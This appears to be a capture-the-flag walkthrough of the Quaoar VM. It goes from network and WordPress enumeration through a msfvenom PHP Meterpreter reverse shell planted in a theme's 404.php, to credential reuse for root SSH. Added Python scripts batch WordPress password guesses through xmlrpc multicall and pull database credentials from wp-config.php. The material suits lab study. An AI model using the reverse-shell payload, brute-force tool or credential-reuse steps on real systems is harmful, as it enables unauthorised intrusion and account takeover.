Quaoar CTF

Started by locating the VM on the local network with an ARP sweep.

root@kali:~# netdiscover -r 10.0.2.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
  10.0.2.1      52:54:00:12:35:00      1      60  Unknown vendor
  10.0.2.2      52:54:00:12:35:00      1      60  Unknown vendor
  10.0.2.3      08:00:27:5e:b4:5a      1      60  Cadmus Computer Systems
  10.0.2.43     08:00:27:38:0c:1b      1      60  Cadmus Computer Systems

The VM is at 10.0.2.43. Next, a full TCP port scan with nmap, running the banner NSE script so that service banners come back with the port list.

root@kali:~# nmap -p- --script=banner 10.0.2.43
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 10.0.2.43
Host is up (0.00018s latency).
Not shown: 65526 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
|_banner: SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1
53/tcp  open  domain
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
993/tcp open  imaps
995/tcp open  pop3s

MAC Address: 08:00:27:38:0C:1B (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 26.33 seconds
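Nmap's normal output is what ends up pasted into notes, so it is worth having a small parser that turns the port table and the attached NSE script lines into structured data, and that splits the SSH banner into its parts (the Debian/Ubuntu package revision in the banner comment is what dates the distro release). This is an added example written for this walkthrough, not part of the original post or of nmap; the sample text is constructed from a few lines of the scan above.

```python
import re

# Constructed sample: part of the port table from the nmap run above, in
# nmap's normal output format (a few ports are enough to exercise the parser).
SAMPLE_NMAP = """\
Nmap scan report for 10.0.2.43
Host is up (0.00018s latency).
Not shown: 65526 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
|_banner: SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1
53/tcp  open  domain
80/tcp  open  http
445/tcp open  microsoft-ds
MAC Address: 08:00:27:38:0C:1B (Oracle VirtualBox virtual NIC)
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
# "|_name: value" (one-line script result) or "| name: value" (first line of a longer one)
SCRIPT_LINE = re.compile(r"^\|[_ ](\S+?):\s*(.*)$")
# SSH identification string: SSH-<proto>-<software>[ <comment>]
SSH_BANNER = re.compile(r"^SSH-(?P<proto>[\d.]+)-(?P<software>\S+)(?:\s+(?P<comment>.*))?$")


def parse_nmap(text):
    """Parse nmap normal output into {(port, proto): {state, service, scripts}}.
    NSE script lines are attached to the most recent port line."""
    ports, current = {}, None
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service = m.groups()
            current = (int(port), proto)
            ports[current] = {"state": state, "service": service, "scripts": {}}
            continue
        m = SCRIPT_LINE.match(line)
        if m and current is not None:
            ports[current]["scripts"][m.group(1)] = m.group(2)
    return ports


def open_ports(text):
    """Sorted (port, service) list of open ports, the usual to-do list for enumeration."""
    return sorted((p, i["service"]) for (p, _), i in parse_nmap(text).items()
                  if i["state"] == "open")


def ssh_fingerprint(text):
    """Split the SSH banner into protocol, software and vendor comment, or None."""
    for info in parse_nmap(text).values():
        m = SSH_BANNER.match(info["scripts"].get("banner", ""))
        if m:
            return m.groupdict()
    return None


if __name__ == "__main__":
    print(open_ports(SAMPLE_NMAP))
    print(ssh_fingerprint(SAMPLE_NMAP))
```

The banner comment "Debian-5ubuntu1" on OpenSSH 5.9p1 is the Ubuntu 12.04 package, which the login banner later in this walkthrough confirms; pulling it out mechanically is how you spot that before touching the box.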

The SSH banner (OpenSSH 5.9p1, Debian-5ubuntu1 packaging) already points at Ubuntu 12.04, which the later login confirms. Port 80/tcp is open, so the first stop was the web root in a browser.

The page showed only images and its source contained nothing useful, so the next step was a nikto scan.

root@kali:~# nikto -h http://10.0.2.43
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.2.43
+ Target Hostname:    10.0.2.43
+ Target Port:        80
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 133975, size: 100, mtime: Mon Oct 24 00:00:10 2016
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wordpress/: A Wordpress installation was found.
+ 8348 requests: 0 error(s) and 13 item(s) reported on remote host
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto confirmed a WordPress installation under /wordpress/ (it is listed in robots.txt). Rather than brute-forcing directories with dirb, wpscan was the better fit: it fingerprints the version, theme and plugins and enumerates users.

root@kali:~# wpscan -u http://10.0.2.43/wordpress --enumerate u
WordPress Security Scanner by the WPScan Team
Version 2.9.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]
[+] URL: http://10.0.2.43/wordpress/
[!] The WordPress 'http://10.0.2.43/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under: http://10.0.2.43/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://10.0.2.43/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://10.0.2.43/wordpress/wp-includes/
[+] WordPress version 3.9.14 identified from meta generator (Released on 2016-09-07)
[+] WordPress theme in use: twentyfourteen - v1.1
[+] Name: twentyfourteen - v1.1
 |  Location: http://10.0.2.43/wordpress/wp-content/themes/twentyfourteen/
[!] The version is out of date, the latest version is 1.9
 |  Style URL: http://10.0.2.43/wordpress/wp-content/themes/twentyfourteen/style.css
 |  Referenced style.css: wp-content/themes/twentyfourteen/style.css
 |  Theme Name: Twenty Fourteen
 |  Theme URI: http://wordpress.org/themes/twentyfourteen
 |  Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
 |  Author: the WordPress team
 |  Author URI: http://wordpress.org/
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    +----+--------+--------+
    | Id | Login  | Name   |
    +----+--------+--------+
    | 1  | admin  | admin  |
    | 2  | wpuser | wpuser |
    +----+--------+--------+

[!] Default first WordPress username 'admin' is still used
[+] Requests Done: 55
[+] Memory used: 15.738 MB
[+] Elapsed time: 00:00:05

Two users. While wpscan was re-running with a wordlist against the admin user, a manual attempt of admin:admin on wp-login.php worked straight away.
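wpscan also reported that xmlrpc.php is reachable, and that is the quieter way to test passwords against the two enumerated users: xmlrpc.php accepts system.multicall, so many wp.getUsersBlogs logins fit into a single POST instead of one wp-login.php request per guess. The code below is an added example written for this walkthrough, not part of the original post or of wpscan. It builds the multicall body with the standard library, sends it (network function, unused offline), and matches each sub-result back to its guess; the target URL, the guess lists and SAMPLE_RESPONSE are constructed. Newer WordPress releases reject every further login attempt within one multicall once one has failed, so fault_summary is there to make that throttling visible before you trust an empty result.

```python
import urllib.request
import xmlrpc.client
from collections import Counter
from itertools import product


def build_multicall(usernames, passwords, method="wp.getUsersBlogs"):
    """Pack every username/password pair into one system.multicall request.

    xmlrpc.php authenticates each sub-call on its own, so a single POST tests
    len(usernames) * len(passwords) guesses. The returned pair list has the
    same order as the sub-calls; that is how results are matched to guesses."""
    pairs = list(product(usernames, passwords))
    calls = [{"methodName": method, "params": [u, p]} for u, p in pairs]
    body = xmlrpc.client.dumps((calls,), methodname="system.multicall")
    return body, pairs


def send_multicall(url, body, timeout=15):
    """POST the body to xmlrpc.php and return the raw XML reply (network; not used offline)."""
    req = urllib.request.Request(url, data=body.encode(),
                                 headers={"Content-Type": "text/xml"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode()


def parse_multicall_response(xml_body, pairs):
    """Return the (user, password) pairs whose sub-call succeeded.

    A failed sub-call comes back as a struct with faultCode/faultString; a
    successful one is a one-element array wrapping the method's normal result."""
    (results,), _ = xmlrpc.client.loads(xml_body)
    if len(results) != len(pairs):
        raise ValueError("%d results for %d sub-calls" % (len(results), len(pairs)))
    return [pair for pair, r in zip(pairs, results)
            if not (isinstance(r, dict) and "faultCode" in r)]


def fault_summary(xml_body):
    """Count fault strings. One 'incorrect password' followed by a run of a
    different message means the target throttles multicall logins and each
    guess needs its own request."""
    (results,), _ = xmlrpc.client.loads(xml_body)
    return dict(Counter(r["faultString"] for r in results
                        if isinstance(r, dict) and "faultCode" in r))


# Constructed reply for the guesses admin:password, admin:admin, admin:letmein:
# two faults around one successful wp.getUsersBlogs result.
SAMPLE_RESPONSE = """<?xml version="1.0"?>
<methodResponse><params><param><value><array><data>
<value><struct>
<member><name>faultCode</name><value><int>403</int></value></member>
<member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
</struct></value>
<value><array><data><value><array><data><value><struct>
<member><name>isAdmin</name><value><boolean>1</boolean></value></member>
<member><name>url</name><value><string>http://10.0.2.43/wordpress/</string></value></member>
<member><name>blogid</name><value><string>1</string></value></member>
<member><name>blogName</name><value><string>Quaoar</string></value></member>
<member><name>xmlrpc</name><value><string>http://10.0.2.43/wordpress/xmlrpc.php</string></value></member>
</struct></value></data></array></value></data></array></value>
<value><struct>
<member><name>faultCode</name><value><int>403</int></value></member>
<member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
</struct></value>
</data></array></value></param></params></methodResponse>
"""

if __name__ == "__main__":
    body, pairs = build_multicall(["admin"], ["password", "admin", "letmein"])
    # Against a live target: reply = send_multicall("http://10.0.2.43/wordpress/xmlrpc.php", body)
    print(parse_multicall_response(SAMPLE_RESPONSE, pairs))
    print(fault_summary(SAMPLE_RESPONSE))
```

wp.getUsersBlogs is used because it needs nothing but credentials and returns a small struct; the same packing works for any authenticated method. Keep the batch size modest: a multicall with thousands of sub-calls is a single slow request that stands out in the access log just as much as a burst of wp-login.php POSTs.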

The next step was a shell. WordPress's theme editor (Appearance > Editor) lets an administrator edit the active theme's PHP files in place, so admin access to the dashboard is code execution as the web server user.

404.php was the first file in the template list, so that is the one I replaced, with a PHP reverse shell generated by msfvenom.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.5 LPORT=4444 -f raw > Desktop/shell.php 

The theme's 404.php runs whenever WordPress cannot find the requested content, so requesting a post that does not exist triggers the payload; the permalink format is visible in the Posts menu, and /wordpress/?p=404.php does the job. A netcat listener on port 4444 confirmed the connect-back.

Then switched to Meterpreter: closed netcat and started a multi/handler in Metasploit for the same payload.

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.0.2.5
lhost => 10.0.2.5
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.5         yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit
[*] Started reverse TCP handler on 10.0.2.5:4444
[*] Starting the payload handler...

Reloading the 404 page delivered the stage and opened a Meterpreter session.

[*] Sending stage (33068 bytes) to 10.0.2.43
[*] Meterpreter session 1 opened (10.0.2.5:4444 -> 10.0.2.43:41189)

sysinfo identified the host.

meterpreter > sysinfo
Computer    : Quaoar
OS          : Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686
Meterpreter : php/php

A few kernel exploits for 3.2.0-23 were tried, but gcc is not installed on the VM (compiling on the attacking box against the same 32-bit Ubuntu 12.04 target is the usual workaround, but the web root turned out to be the easier path). The PHP session starts in the WordPress document root, /var/www/wordpress.

meterpreter > ls
Listing: /var/www/wordpress
===========================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  418    fil   2016-10-26 20:45:26 -0400  index.php
100644/rw-r--r--  19930  fil   2016-10-26 20:45:26 -0400  license.txt
100644/rw-r--r--  7195   fil   2016-10-26 20:45:26 -0400  readme.html
100644/rw-r--r--  4896   fil   2016-10-26 20:45:26 -0400  wp-activate.php
40755/rwxr-xr-x   4096   dir   2016-10-26 20:45:26 -0400  wp-admin
100644/rw-r--r--  271    fil   2016-10-26 20:45:26 -0400  wp-blog-header.php
100644/rw-r--r--  4818   fil   2016-10-26 20:45:26 -0400  wp-comments-post.php
100644/rw-r--r--  3087   fil   2016-10-26 20:45:26 -0400  wp-config-sample.php
100666/rw-rw-rw-  3441   fil   2016-11-30 00:02:01 -0500  wp-config.php
40755/rwxr-xr-x   4096   dir   2016-10-26 20:45:26 -0400  wp-content
100644/rw-r--r--  2932   fil   2016-10-26 20:45:26 -0400  wp-cron.php
40755/rwxr-xr-x   4096   dir   2016-10-26 20:45:26 -0400  wp-includes
100644/rw-r--r--  2380   fil   2016-10-26 20:45:26 -0400  wp-links-opml.php
100644/rw-r--r--  2359   fil   2016-10-26 20:45:26 -0400  wp-load.php
100644/rw-r--r--  33609  fil   2016-10-26 20:45:26 -0400  wp-login.php
100644/rw-r--r--  8235   fil   2016-10-26 20:45:26 -0400  wp-mail.php
100644/rw-r--r--  11070  fil   2016-10-26 20:45:26 -0400  wp-settings.php
100644/rw-r--r--  25665  fil   2016-10-26 20:45:26 -0400  wp-signup.php
100644/rw-r--r--  4026   fil   2016-10-26 20:45:26 -0400  wp-trackback.php
100644/rw-r--r--  3032   fil   2016-10-26 20:45:26 -0400  xmlrpc.php

wp-config.php holds the MySQL credentials, and as the listing shows it is also world-writable (mode 0666), a finding in itself: any local user could swap the database credentials or inject PHP into it. The relevant settings:

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');
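Pulling credentials out of wp-config.php by eye works for one box; on an engagement with many of them it pays to parse the define() lines properly, skipping commented-out values and handling both quote styles, and to turn the result straight into the reuse candidates to try elsewhere. The code below is an added example for this walkthrough, not code from the original post or from WordPress. SAMPLE_WP_CONFIG is constructed from the excerpt above plus a commented-out define, a double-quoted value and a non-string define to exercise the parser; the extra user list passed to reuse_candidates is an assumption.

```python
import re

# Constructed sample built from the wp-config.php excerpt above, plus a
# commented-out define, a double-quoted value and a boolean define.
SAMPLE_WP_CONFIG = """<?php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
/** MySQL hostname */
define('DB_HOST', 'localhost');
// define('DB_PASSWORD', 'oldpassword');
define("AUTH_KEY", "put your unique phrase here");
define('WP_DEBUG', false);
"""

# define('NAME', 'value') with either quote style; the value may contain
# backslash-escaped characters, and the closing quote must match the opening one.
DEFINE_RE = re.compile(
    r"""define\(\s*(['"])(?P<name>[A-Z0-9_]+)\1\s*,\s*(['"])(?P<value>(?:\\.|(?!\3).)*)\3\s*\)"""
)


def parse_defines(php_source):
    """Return {NAME: value} for string constants set with define() in a
    wp-config.php, ignoring lines commented out with //, # or /* ... */."""
    found = {}
    for line in php_source.splitlines():
        if line.lstrip().startswith(("//", "#", "/*", "*")):
            continue
        for m in DEFINE_RE.finditer(line):
            raw = m.group("value")
            # Undo the escapes PHP allows inside quoted strings; this is enough
            # for credential extraction and deliberately not a full PHP parser.
            found[m.group("name")] = (raw.replace("\\'", "'")
                                         .replace('\\"', '"')
                                         .replace("\\\\", "\\"))
    return found


def db_credentials(php_source):
    """The MySQL connection tuple (host, user, password, database)."""
    c = parse_defines(php_source)
    return (c.get("DB_HOST", "localhost"), c.get("DB_USER"),
            c.get("DB_PASSWORD"), c.get("DB_NAME"))


def reuse_candidates(php_source, extra_users=("root",)):
    """Credential pairs worth trying against SSH and other local services:
    the DB user itself, then the DB password against other likely accounts."""
    _, user, password, _ = db_credentials(php_source)
    if not password:
        return []
    users = [user] + [u for u in extra_users if u != user]
    return [(u, password) for u in users]


if __name__ == "__main__":
    print(db_credentials(SAMPLE_WP_CONFIG))
    print(reuse_candidates(SAMPLE_WP_CONFIG, extra_users=("root", "wpadmin")))
```

On this target the DB user is already root, so the candidate list is just root:rootpassword!, which is exactly the pair tried over SSH below; on a box where the DB user is something like wp_db, the second element (the DB password against root and the site's named accounts) is the one that usually pays off.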

MySQL itself runs as the unprivileged mysql user, so the database credentials alone are not a path to root.

meterpreter > ps
Process List
============

 PID   Name              Arch  User   Path
 1136  /usr/sbin/mysqld        mysql  /usr/sbin/mysqld

After a little more digging through directories, the pattern stood out: the WordPress admin password was admin:admin, so password reuse elsewhere was likely. The MySQL user in the config file is root with password rootpassword!, and the obvious test is whether the same pair works for the system root account over SSH.

root@kali:~# ssh root@10.0.2.43
The authenticity of host '10.0.2.43 (10.0.2.43)' can't be established.
ECDSA key fingerprint is SHA256:+ODdJgfptUyyVzKI9wDm804SlXxzmb4/BiKsHCnHGeg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.0.2.43' (ECDSA) to the list of known hosts.
root@10.0.2.43's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System load:  0.26              Processes:             105
  Usage of /:   30.8% of 7.21GB   Users logged in:       0
  Memory usage: 30%               IP address for eth0:   10.0.2.43
  Swap usage:   0%                IP address for virbr0: 192.168.122.1

  => There is 1 zombie process.

  Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com
root@Quaoar:~#

Root. The last step was the flags; flag.txt is the usual name, so updatedb and locate find them directly.

root@Quaoar:~# updatedb
root@Quaoar:~# locate flag.txt
/home/wpadmin/flag.txt
/root/flag.txt

root@Quaoar:~# cat /home/wpadmin/flag.txt
2bafe61f03117ac66a73c3c514de796e
root@Quaoar:~# cat /root/flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb
root@Quaoar:~#